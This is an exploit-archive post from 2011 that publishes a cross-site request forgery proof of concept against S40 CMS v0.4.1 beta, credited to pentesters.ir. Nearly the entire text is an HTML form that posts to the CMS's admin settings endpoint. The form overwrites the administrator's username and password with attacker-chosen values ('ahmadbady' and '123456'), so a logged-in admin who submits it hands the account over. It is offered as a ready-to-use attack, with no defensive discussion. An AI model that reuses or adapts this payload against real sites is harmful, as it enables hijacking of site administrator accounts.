S40 CMS v.0.4.1 Change Admin Passwd CSRF Exploit

2011-01-04 11:15:20

In The Name Of GOD
[+] Exploit Title:remote change user and password exploit
[+] Date: 2010
[+] script:S40 CMS v.0.4.1 beta
[+] Software: http://s40.biz/?p=download
[+] Author : pentesters.ir
[+]discovered by:ahmadbady
[+] Contact : [email protected]
[+] Website : WwW.PenTesters.IR
expl:
<h1>coded by ahmadbady</h1>
<div id="inner">
<h1>http://pentesters.ir</h1>
<form id="settings" name="settings" method="post" action="/S40CMS_041_beta/admin/main.php?a=settings" class="form">
<table width="100%" border="0" cellspacing="2" cellpadding="0">
<tr>
<td colspan="2"><h2>Site settings</h2></td>
</tr>
<tr>
<td width="70%" align="left" valign="top">The name of your site</td>
<td width="30%" align="left" valign="top"></td>
</tr>
<tr>
<td width="70%" align="left" valign="top">
<input name="title" type="text" class="validate[required] field" id="title" style="width:99%" value="root" /></td>
<td width="30%" align="left" valign="top"></td>
</tr>
<tr>
<td align="left" valign="top">Root URL address of your site (with end slash)</td>
<td align="left" valign="top"> </td>
</tr>
<tr>
<td align="left" valign="top"><input name="home" type="text" class="validate[required] field" id="home" style="width:99%" value="http://www.dgdfgfgdfgdgdfgfdfgdf.com" /></td>
<td align="left" valign="top"> </td>
</tr>
<tr>
<td colspan="2" align="left" valign="top">Your slogan</td>
</tr>
<tr>
<td colspan="2" align="left" valign="top"><input name="slogan" type="text" class="validate[required] field" id="slogan" style="width:99%" value="roooot" /></td>
</tr>
<tr>
<td colspan="2" align="left" valign="top">Keywords</td>
</tr>
<tr>
<td colspan="2" align="left" valign="top"><input name="keywords" type="text" class="validate[required] field" id="keywords" style="width:99%" value="S40 CMS, content, management, system, cms" /></td>
</tr>
<tr>
<td width="70%" align="left" valign="top">Description</td>
<td width="30%" align="left" valign="top">Site theme</td>
</tr>
<tr>
<td width="70%" rowspan="4" align="left" valign="top"><textarea name="description" id="description" rows="5" style="width:99%;" class="field">S40 CMS Free flat file Content Management System</textarea></td>
<td width="30%" align="left" valign="top">
<select name="theme" id="theme">
<option value="default" selected="selected">default</option> </select></td>
</tr>
<tr>
<td width="30%" align="left" valign="top">Site language</td>
</tr>
<tr>
<td width="30%" align="left" valign="top"><select name="lang" id="lang">
<option value="en" selected="selected">en</option> </select></td>
</tr>
<tr>
<td width="30%" align="left" valign="top">Language direction</td>
</tr>
<tr>
<td width="70%" align="left" valign="top"><h2>User settings</h2></td>
<td align="left" valign="top"><select name="langdir" id="langdir">
<option value="ltr" selected="selected">ltr</option><option value="rtl">rtl</option> </select></td>
</tr>
<tr>
<td align="left" valign="top">Your name</td>
<td align="left" valign="top">Sidecol position</td>
</tr>
<tr>
<td align="left" valign="top"><input name="name" type="text" class="validate[required] field" id="name" style="width:99%" value="ahmadbady" /></td>
<td align="left" valign="top"><select name="sidecol" id="sidecol">
<option value="right" selected="selected">Right</option><option value="left">Left</option> </select></td>
</tr>
<tr>
<td align="left" valign="top">Username-----At least 6 characters</td></td>
<td align="left" valign="top">Display headerbar</td>
</tr>
<tr>
<td align="left" valign="top"><input name="user" type="text" class="validate[required,length[6,24]] field" id="user" style="width:99%" value="ahmadbady" /></td>
<td align="left" valign="top"><select name="headerbar" id="headerbar">
<option value="true" selected="selected">Display</option><option value="false">Hide</option> </select></td>
</tr>
<tr>
<td align="left" valign="top">Password-----just 6 characters</td></td>
<td align="left" valign="top"> </td>
</tr>
<tr>
<td align="left" valign="top"><input name="pass" type="password" class="validate[required,length[6,24]] field" id="pass" style="width:99%" value="123456" /></td>
<td align="left" valign="top"> </td>
</tr>
<tr>
<td align="left" valign="top">Password again-----just 6 characters</td></td>
<td align="left" valign="top"> </td>
</tr>
<tr>
<td align="left" valign="top"><input name="passco" type="password" class="validate[required,confirm[pass]] field" id="passco" style="width:99%" value="123456" /></td>
<td align="left" valign="top"> </td>
</tr>
<tr>
<td colspan="2" align="left" valign="top"><input name="installed" type="hidden" id="installed" value="true" />
<input name="submit" type="hidden" id="submit" value="true" />
<input name="actions" type="hidden" id="actions" value="settings" /></td>
</tr>
<tr>
<td colspan="2" align="center" valign="top"><input type="submit" name="button" id="button" value="Save" class="save" /></td>
</tr>
<tr>
<td colspan="2" align="center" valign="top"> </td>
</tr>
</table>
</form>
</div>
</div>
<div id="end" class="roundbtm"></div>
</div>
<div id="footer">
</div>
</body>
</html>
<!-- Dynamic page generated in 0.161 seconds. -->
<!-- Cached page generated by WP-Super-Cache on 2011-01-05 09:42:23 -->
<!-- super cache -->

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.